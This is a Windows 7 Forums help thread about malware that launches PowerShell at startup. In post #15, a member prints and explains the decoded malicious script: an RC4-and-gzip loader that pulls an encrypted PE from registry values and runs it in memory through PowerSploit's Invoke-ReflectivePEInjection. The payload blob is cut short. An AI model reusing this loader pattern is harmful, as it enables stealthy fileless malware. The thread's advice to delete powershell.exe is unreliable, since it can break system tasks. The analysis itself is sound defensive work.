Windows 7 Forums

Welcome to Windows 7 Forums. Our forum is dedicated to helping you find support and solutions for any problems regarding your Windows 7 PC be it Dell, HP, Acer, Asus or a custom build. We also provide an extensive Windows 7 tutorial section that covers a wide range of tips and tricks.


Windows 7: PowerShell starts with Windows, can't disable it from msconfig.exe

02 Oct 2015   #11
YUNoCake

Windows 7 Ultimate 64bit
 
 

Well I have finally found a workaround. I had to get the ownership of the powershell folder, delete the .exe and then I was able to remove that startup item. Thank you anyway and hope someone will find this info useful sometime.


My System SpecsSystem Spec
.
02 Oct 2015   #12
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

Whatever works for you 'salright I guess. At least run a scan with MBAM... RogueKiller finds all kinds of stuff too.
My System SpecsSystem Spec
03 Oct 2015   #13
ICIT2LOL

Desk1 7 Home Prem / Desk2 10 Pro / Main lap Asus ROG 10 Pro 2 laptop Toshiba 7 Pro Asus P2520 7 & 10
 
 

My two cents worth run this through the machine Download Kaspersky Rescue Disk 10 it needs to have a bootable disk made and the BIOS set to boot from the disk or stick that the program is on.

For what it is worth I never go "looking" for malware for any reason it simply is contra to anything we are always reading about and in my mind the only malware that could use for any purpose would have to be well known and also carries the possibility of passing it on to others through whatever one does on their machine and that includes somewhere like this forum.
My System SpecsSystem Spec
.

03 Oct 2015   #14
UsernameIssues

W7 Pro SP1 64bit
 
 

Quote   Quote: Originally Posted by YUNoCake View Post
Well I have finally found a workaround. I had to get the ownership of the powershell folder, delete the .exe and then I was able to remove that startup item. Thank you anyway and hope someone will find this info useful sometime.
There are many Windows scheduled tasks that run PowerShell scripts. These will probably fail now that you deleted the exe for PowerShell.
My System SpecsSystem Spec
03 Oct 2015   #15
Pyprohly

Windows 10, Windows 8.1 Pro, Windows 7 Professional, OS X El Capitan
 
 

Quote   Quote: Originally Posted by YUNoCake View Post
I have just tried your command but gave me this error
Oops, sorry, not sure how a colon slipped through. Actually, colons after registry hive names is how you’d reference a registry path in PowerShell. All this PowerShell talk is confusing me. The corrected Command Prompt command is,
Code:
reg query "HKCU\Software\Classes\FYTNHRWPQH" /v "GAZADSLU"
But never mind that, you’ve managed to post the string that that registry value contained in one piece. And behold, it decodes to the following script, (which is a bit long. Lobbed a few lines off),
Code:
$MEVCSVYQHEFEAP = 'FYTNHRWPQH'; 
$FMgcWUTxuAUGpoG = '{76DA0B7A-7C82-469A-AA3B-FABB6FD1AE48}';
$HLpEpbsbTddkuXUoMf = '{92624DF7-3330-41AD-A818-7B33982D7FCE}';
Function YYNIMJPQCCKGZQU{
	Param([Parameter( Position = 0, Mandatory = $true )][Byte[]]$QWtCWDrqWbRTuX,[Parameter(Position = 1, Mandatory = $true)][Byte[]]$ENKLQLMMOW)
	[Byte[]]$k = New-Object Byte[] 256;
	[Byte[]]$s = New-Object Byte[] 256;
	for ($i = 0; $i -lt 256; $i++){
		$s[$i] = [Byte]$i;
		$k[$i] = $ENKLQLMMOW[$i % $ENKLQLMMOW.Length];
	}
	$p = 0;
	for ($i = 0; $i -lt 256; $i++){
		$p = ($p + $s[$i] + $k[$i]) % 256;
		$s[$i],$s[$p] = $s[$p],$s[$i];
	}
	$i = 0;$p = 0;
	for ($c = 0; $c -lt $QWtCWDrqWbRTuX.Length; $c++){
		$i = ($i + 1) % 256;
		$p = ($p + $s[$i]) % 256;
		$s[$i],$s[$p] = $s[$p],$s[$i];
		[int]$m = ($s[$i] + $s[$p]) % 256;
		$QWtCWDrqWbRTuX[$c] = $QWtCWDrqWbRTuX[$c] -bxor $s[$m];
	}
	return $QWtCWDrqWbRTuX;
}
Function inflatebin{
	Param([Parameter( Position = 0, Mandatory = $true )]$QWtCWDrqWbRTuX)
	$memstream = New-Object System.IO.MemoryStream;
	$memstream.Write($QWtCWDrqWbRTuX, 0, $QWtCWDrqWbRTuX.Length);
	$memstream.Seek(0,0) | Out-Null;
	$gzstream = New-Object System.IO.Compression.GZipStream($memstream,[IO.Compression.CompressionMode]::Decompress);
	$reader = New-Object System.IO.StreamReader($gzstream);
	$QWtCWDrqWbRTuX = $reader.ReadToEnd();
	$reader.close();
	return $QWtCWDrqWbRTuX;
}
$qusQlVRMRdHEGECLL = [System.Text.Encoding]::ASCII.GetBytes('qkct9qPltyPEVxqdVz');
$SkVuQXvIFYKqfzFWFOMV = [System.Convert]::FromBase64String('+ncnYXTMbk4BqVTULbs92y3VO+DdkwnGz3xKwA7rs/G46H2o63lNDqQdZtg9zPMOEx4oH5PMsyk+ZU5pUzhRFv2GrjnCdjYf9vnpyasCicjQkIBCvKpm3rWq3uY2aQMDWxi9YTaFbLY770ty5yXeMaHymO3F7UdEKu4ji1QKYA33Xu1afVfALLXOwBpOhZL28Ww9CtLUHkagUzzIpbq1HcnxHuJjORbu5MX+lGLsytfgnsskenFKnWG36AeLBKf9tt9eiGVotIfPMuR7xlC7IU8QKhMX7sP2LnbqhhlhmzmQePXt9hsyotNL76G5mSZap4oVLPp6zBN41dF
[... ... ...]
SgoDiWDpZyXi1sOTK2crN8twGGABJQkvO2AWPtswIYO+1mcMsyqD8eY33O5dpZh+NK3PpUPyn4cNx4hQ8IanBUZMPMIxx6FxUQyVxQiLgJN7RtstQ+YQJOi1y2bf81kyBeLiqxONXOF24cTvZ0U23n+d4gdhYR3XpgmVIikOZuNKDAXLM0mJxTTzEfCAhXU8S/5MMx1FZle6JjS47sJ3wXrMYCk/gOcqNQqrDxWw0IojQUQnmASez4bWSbAPOjO0tGRZFxnzEhf0Amq1I0uaw');
$SkVuQXvIFYKqfzFWFOMV = YYNIMJPQCCKGZQU -QWtCWDrqWbRTuX $SkVuQXvIFYKqfzFWFOMV -ENKLQLMMOW $qusQlVRMRdHEGECLL
$SkVuQXvIFYKqfzFWFOMV = inflatebin -QWtCWDrqWbRTuX $SkVuQXvIFYKqfzFWFOMV

$PRIMNMSFSZY = 'HKCU:\Software\Classes\' + $MEVCSVYQHEFEAP;
$JMQJRCFCXMMNCDMDKDI = '';
if ([IntPtr]::Size -eq 8) {
	$JMQJRCFCXMMNCDMDKDI = (Get-ItemProperty -Path $PRIMNMSFSZY -Name $FMgcWUTxuAUGpoG).$FMgcWUTxuAUGpoG;
}else{
	$JMQJRCFCXMMNCDMDKDI = (Get-ItemProperty -Path $PRIMNMSFSZY -Name $HLpEpbsbTddkuXUoMf).$HLpEpbsbTddkuXUoMf;
}
$JMQJRCFCXMMNCDMDKDI = YYNIMJPQCCKGZQU -QWtCWDrqWbRTuX $JMQJRCFCXMMNCDMDKDI -ENKLQLMMOW $qusQlVRMRdHEGECLL
#$JMQJRCFCXMMNCDMDKDI = inflatebin2 -QWtCWDrqWbRTuX $JMQJRCFCXMMNCDMDKDI

$SkVuQXvIFYKqfzFWFOMV = $SkVuQXvIFYKqfzFWFOMV + 'Invoke-ReflectivePEInjection -PEBytes $JMQJRCFCXMMNCDMDKDI;'
iex $SkVuQXvIFYKqfzFWFOMV;
At a glance, there is not much that can be gathered; it’s almost as obfuscated as it was encoded… But there is one clue in the script that will tell us if it lives for good or evil. On line 53, the second last line of the script, a particular cmdlet is mentioned within a string—Invoke-ReflectivePEInjection—and this cmdlet does not exist in any standard builtin PowerShell module. Let’s give it a Google now…

Okay, first link brings us to this GitHub page. Invoke-ReflectivePEInjection appears to be part of a module called CodeExecution, which is included in a library of modules called PowerSploit. A PowerShellMagazine article explains what PowerSploit is and what it's capable of doing:
Quote:
PowerSploit is an offensive security framework for penetration testers and reverse engineers. It was born out of the realization that PowerShell was the ideal post-exploitation utility in Windows due to its ability to perform a wide range of administrative and low-level tasks all without the need to drop malicious executables to disk, thus, evading antivirus products with ease.
The PowerSploit GitHub repository offers a briefing of what CodeExecution's Invoke-ReflectivePEInjection cmdlet does:
Quote:
Injects a Dll into the process ID of your choosing
And some further insight obtained from this other website:
Quote:
Invoke-ReflectivePEInjection is a PowerShell script which can reflectively load and execute a windows PE file such as an EXE or DLL inside the PowerShell process on a remote computer without writing to disk. This is accomplished by (partially) rewriting the Win32 functionality which loads EXEs/DLLs in PowerShell.
Lastly, it's worth mentioning, Clymb3r, the author of PowerSploit according to the GitHub repository, has a WordPress blog where he shows off his "hacking and general mayhem" techniques.

Also, in YUNoCake's startup script, the Invoke-ReflectivePEInjection cmdlet uses the 'PEBytes' parameter, which was added 8 months ago, so YUNoCake's acquired script must have been a fairly recent build.
My System SpecsSystem Spec
03 Oct 2015   #16
Layback Bear

Windows 7 Pro. 64/SP-1
 
 

Very well done research Pyprohly!
My System SpecsSystem Spec
04 Oct 2015   #17
ICIT2LOL

Desk1 7 Home Prem / Desk2 10 Pro / Main lap Asus ROG 10 Pro 2 laptop Toshiba 7 Pro Asus P2520 7 & 10
 
 

Quote   Quote: Originally Posted by Layback Bear View Post
Very well done research Pyprohly!
That P that stuff might as well be in Klingon to me (most of it is LOL!!) - seriously am impressed and if I could rep you I would
My System SpecsSystem Spec
Reply

 PowerShell starts with Windows, can't disable it from msconfig.exe




Thread Tools Search this Thread
Search this Thread:

Advanced Search




Similar help and support threads
Thread Forum
is there anyway to disable msconfig?
reason i want to disable it is due to safe mode,as i want to disable sae mode with networking permanently so my little brother cant bypass my k9 web filter. ive disabled run,control panel and services.msc so far
Performance & Maintenance
Cant disable programs in msconfig startup
I'm having all sorts of problems trying to configure startup for windows. I disable a program, then after rebooting it starts up again and the checkbox is checked (in msconfig). When I try to enable a program, it does the opposite and wont run and the checkbox is empty after a reboot. also, some...
General Discussion
Which Startup Entries can i disable in msconfig
I'm trying to improve the performance of my Dad's Ultrabook. It is a Toshiba Satellite T230D, Running Windows 7 Home Premium 32bit. AMD Athlon II Neo 1.70GHz, 2.00GB Memory. I've just done a refresh on the PC, back to out of box state. Installed his security suite and a couple other programs....
Performance & Maintenance
BSOD ntoskrnl.exe+75c00 randomly... maybe when Powershell.exe starts
Hello I am getting almost every time I boot W7 the BSOD described in the thread title... I suspect it's related to an automatic task which starts to backup my laptop in the network using TSM, but I think it's unrelated to TSM, it could be more related to a bug of the powershell process (but...
BSOD Help and Support
how to disable base video mode boot in msconfig
My OS is Windows 7 32 bits. I checked base video in boot option in msconfig and also checked make all boot settings permanent. So my window always boots with low resolution mode. Therefore I rechecked base video, checked all boot settings permanent, applied, ok and then restarted the windows. OK....
General Discussion
Which programs are safe to disable with MSCONFIG Startup tab?
I have a few remaining programs which I would like to disable, however, do not want to disable any programs which will result in me losing some functionality. I'm mostly unsure about the HP programs, but that seem to me, just some form of OEM bloatware. Thanks, Harry Please see...
General Discussion


Our Sites

Site Links

About Us

Find Us

Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd

All times are GMT -5. The time now is 00:00.

Twitter Facebook Google+



Windows 7 Forums

Seven Forums Android App Seven Forums IOS App